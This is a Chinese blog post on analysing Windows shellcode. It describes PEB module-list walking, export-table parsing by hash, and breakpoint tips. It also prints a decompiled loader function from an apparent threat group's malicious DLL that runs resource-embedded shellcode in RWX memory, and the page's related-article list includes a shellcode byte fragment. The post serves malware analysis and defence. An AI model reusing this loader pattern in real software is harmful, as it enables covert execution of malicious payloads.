shellcode分析技巧

最新推荐文章于 2024-10-21 11:58:28 发布
最新推荐文章于 2024-10-21 11:58:28 发布
阅读量497 收藏
点赞数
文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571990/article/details/127215309
版权

概述

0x00

一般情况下shellcode会首先通过PEB定位到_PEB_LDR_DATA(+0xC)结构,然后从该结构中取出一条链表,可以是InLoadOrderModuleList(+0xC)可以是InMemoryOrderModuleList (+0x14)可以是InInitializationModuleList(+0x1c),之后通过遍历这条双向链表来解析LDRDATA_TABLE_ENTRY结构体,从该结构体中提取对应模块的长度(+0x2c)和名称(+0x30)。通过比较模块长度和字符串值来找到需要导入的模块的基址。

0x01

之后解析模块对应的PE文件,首先定位到DataDirectory结构体数组,然后确定导出表RVA,之后通过基址算出导出表地址,然后确定导出函数序号表的RVA(+0x24),导出函数名称表的RVA(+x20),导出函数地址表的RVA(+0x1c),导出函数个数(+0x18)。一般情况下shellcode这里通过比较函数的哈希来定位模块的导出函数。

0x02

最后,分析shellcode时一般只要对其中的call和跳转下断点就能迅速搞清楚其大致的功能了。

例子

这是某组织使用的样本。该样本通过白加黑调用恶意DLL,该DLL从资源段中读取shellcode来执行一个新线程。

  1. char sub_10001BF0()

  2. {

  3. HMODULE v0; // edi

  4. HRSRC v1; // esi

  5. HGLOBAL v2; // ebx

  6. DWORD v3; // edi

  7. const void *v4; // ebx

  8. DWORD (__stdcall *v5)(LPVOID); // eax

  9. DWORD (__stdcall *v6)(LPVOID); // esi

  10. HANDLE v7; // eax

  11. DWORD ThreadId; // [esp+4h] [ebp-4h]

  13. v0 = hModule;

  14. InterlockedCompareExchange(&Destination, 1, 2);

  15. if ( Destination == 1 )

  16. {

  17. Destination += 2;

  18. v1 = FindResourceExW(v0, (LPCWSTR)274, (LPCWSTR)365, 1033u);

  19. GetLastError();

  20. if ( v1 )

  21. {

  22. v2 = LoadResource(v0, v1);

  23. if ( v2 )

  24. {

  25. v3 = SizeofResource(v0, v1);

  26. if ( v3 )

  27. {

  28. v4 = LockResource(v2);

  29. if ( v4 )

  30. {

  31.   v5 = (DWORD (__stdcall *)(LPVOID))VirtualAlloc(0, v3, 0x3000u, 0x40u);

  32. v6 = v5;

  33. if ( v5 )

  34. {

  35. memmove(v5, v4, v3);

  36. ThreadId = 0;

  37. v7 = CreateThread(0, 0x400000u, v6, 0, 0, &ThreadId);

  38. WaitForSingleObject(v7, 0xFFFFFFFF);

  39. VirtualFree(v6, v3, 0x8000u);

  40. }

  41. }

  42. }

  43. }

  44. }

  45. ExitProcess(0);

  46. }

  47. return 1;

  48. }

shellcode执行流程和概述大同小异 首先定位到双向链表

然后解析PE文件

循环比较hash值

不同之处在于在循环比较的过程中有特别多的混淆

之后会一块一块的导入需要的函数,比如通过CreateThread执行一个线程开启一个服务,从ProgramData目录下读入一个Json文件到内存中通过CryptDecrypt来进行解密。解密出来的PE文件为该组织常用Beacon.dll

后续shellcode直接从"MZ"开始执行,并将导出函数_execute代码块复制到一块新的内存中跳转执行。

小黑安全
关注
网络安全】红蓝攻防:shellcode分析
HBohan的博客
01-10 4172
在做红蓝攻防时,常常要用到cs、msf等工具,使用工具生成shellcode或可执行程序,那么小小的shellcode为何能做这么多事情,拿到shellcode后又该怎么分析。希望这篇文章能给大家带来答案,文章中不正确的地方请及时指出。
171224 逆向-EvilExe的Shellcode分析
whklhhhh的博客
12-24 505
1625-5 王子昂 总结《2017年12月24日》 【连续第450天总结】 A. JarvisOJ-EvilExe(Shellcode分析) B. ShellCode分析Shellcode复制到OD随便一段空白处中进行分析 注意跳转执行的时候是从第二个字节开始,第一个字节0xEE是没有用的右击第二个字节,设置EIP进行执行 可以发现它动态获取Kernel32.dll和通过LoadL
恶意代码分析-第十九章-shellcode分析
每昔的博客
09-13 1972
笔记 shellcode:一个可执行代码的有效载荷,包含可执行代码 加载shellcode分析:在IDApro中分析时,选择处理器类型Interl 80x86 processers,并选择32-bit disassembly 使用位置无关代码: 第一条和第二条指令都是通过将EIP寄存器指定的当前位置加上一个保存在指令中的相对偏移值来计算。所以是位置无关代码 第三条指令是一个访问全局数...
免杀基本知识,shellcode混淆免杀
白帽子凯哥聊黑客
10-17 1113
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
windows下的shellcode剖析浅谈
稻草人的高粱地
11-04 809
 今天是中秋节,正好我的文章在今天基本完成,作为中秋礼物送给大家,由于本人水平有限希望大家多多批评指正!学习了好些日子了,思路总是乱乱的,这几天决定养成个好习惯,把自己学习的一些东西做一些总结写篇文章,以便归纳和总结,并从中能够更深刻更系统化的理解其技术原理。  今天,就从shellcode来下手吧!  说到shellcode可能都有些迷茫,不知它是什么东西,可能觉得也很神秘,对于它的专业解释也很
[0day]ShellCode分析
AlwaysBetter
04-27 243
学习了一份shellcode 记录一下分析 #include <stdio.h> #include <string.h> #include <stdlib.h> int main() { __asm { jmp mainbegin __emit 'B' __emit 'E' __emit 'G' __emit 'I' __emit 'N' __emit '\0' } mainbegin: _asm { nop nop
威胁分析与响应能力—Shellcode分析与检测技巧
qq_44005305的博客
08-30 1106
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。
CS-Shellcode分析入门 第二课
WgpSec狼组安全团队
03-28 1074
本文作者:Gality 本文字数:3700 阅读时长:20~30分钟 附件/链接:点击查看原文下载 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 本文链接:阅读更佳 https://mp.weixin.qq.com/s/uQjkf5fTf8s_qAOwZkcpLA 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章...
利用图片隐藏Shellcode技巧分析
"这篇资料是关于壳码(Shellcode)隐藏技术的,主要探讨如何将Shellcode藏在图片等不同的文件格式中,以此规避安全检测。由iDefense Labs的研究员Greg MacManus和Michael Sutton共同讲解,内容涵盖了Shellcode的历史...
shellcode加载器
10-02
Shellcode加载器是一种技术,主要用于在目标系统上执行任意代码,通常用于渗透测试或恶意软件开发。Shellcode是一小段机器码,可以直接被CPU执行,而无需通过解释器或虚拟机。这种加载器的设计旨在绕过安全机制,...
Word溢出Shellcode分析
03-16
### Word溢出Shellcode分析 #### 一、概述 本文档详细分析了一个Word文档中的溢出漏洞,并重点关注了其中的Shellcode部分。该Shellcode针对的是较旧版本的Microsoft Office软件(例如Office 2003),且在未打补丁...
scdbg:跨平台Shellcode分析工具详解
scdbg的基本原理在于通过模拟执行和API hook技术来追踪Shellcode的行为。它监控并记录Shellcode调用的大量系统API,尽管对于某些涉及敏感操作(如创建文件或网络访问)的API,scdbg不会真的执行它们,而是返回假的...
Shellcode详解
N阶二进制的博客
06-18 2615
Shellcode是一种小巧、紧凑的机器代码,通常用于利用软件漏洞或注入攻击中。其名称来源于早期的黑客技术,其中的代码通常会启动一个命令行shell(如Bash或cmd),因此称为“shellcode”。不过,现在shellcode不仅仅用于启动shell,还可以执行各种恶意活动,如下载并执行恶意软件、修改系统设置等。
简单Shellcode的详细分析
wangkr的专栏
11-20 3028
作 者: moonflow 百年一遇的高级光棍节,我得写篇详细完整的文章才行。初学者,菜文,老鸟请飘过 分析段简单的shellcode代码 1.shellcode.c 代码: #include   static char shellcode[]=    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x4
记一次攻防样本——shellcode分析
最新发布
若有战,召必回
10-21 558
值为0,那么这里就会调用VirtualProtect函数将,现在加载到内存的pe的可执行段权限修改为可读可执行,这里攻击者这么做的目的也非常明显,因为上面我们分析sub_19396的时候,如何a4==4,其将申请的空间的权限,利用VirtualProtect将其修改成可读可写了,没有执行权限,那么这里攻击者经过上面一堆操作,差不多就是手动的把文件格式pe以内存格式(也就是我们常说的拉升)加载到了内存的一个地址,并且做了一些还原,对可执行段代码进行解密,对导入函数表解密还原,对重定向表进行修复等相关操作;
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 9055
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
一个shellcode的细致分析
把梦想放飞在蓝色的天空里...
03-27 2504
从古河分析的一个FLASH样本(链接:http://bbs.pediy.com/showthread.php?t=147686)里扣出来的shellcode,对它进行了一番分析,一来是很久没玩过shellcode了,二来是想看看里头有啥创新的地方没有~ 一部分 0040E7D4 > D9C8 fxch st   ; exchange st0 and st0,不是很清楚这个操作 0040E7D
恶意代码分析实战 16 Shellcode分析
农夫果园好好喝的博客
01-25 1536
切换回来,208处pop指令会将栈顶也就是224这个地址赋给esi,之后push则是将其压栈,mov指令将esi赋给edi,lodsb指令在这里是将esi赋给eax,esi中的地址是224,该地址的值是多少呢?可以看到该地址的值是49h,也就是将49h赋给eax,之后al赋给dl,dl此时的值就是49h,dl减去41h,所得结果左移4位,然后esi自增,变成了225,同样定位225,按d键,结果如下。这个shellcode使用了一种字母编码的方式,攻击负载的一个字节存储在两个编码字节的低4比特位。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小黑安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值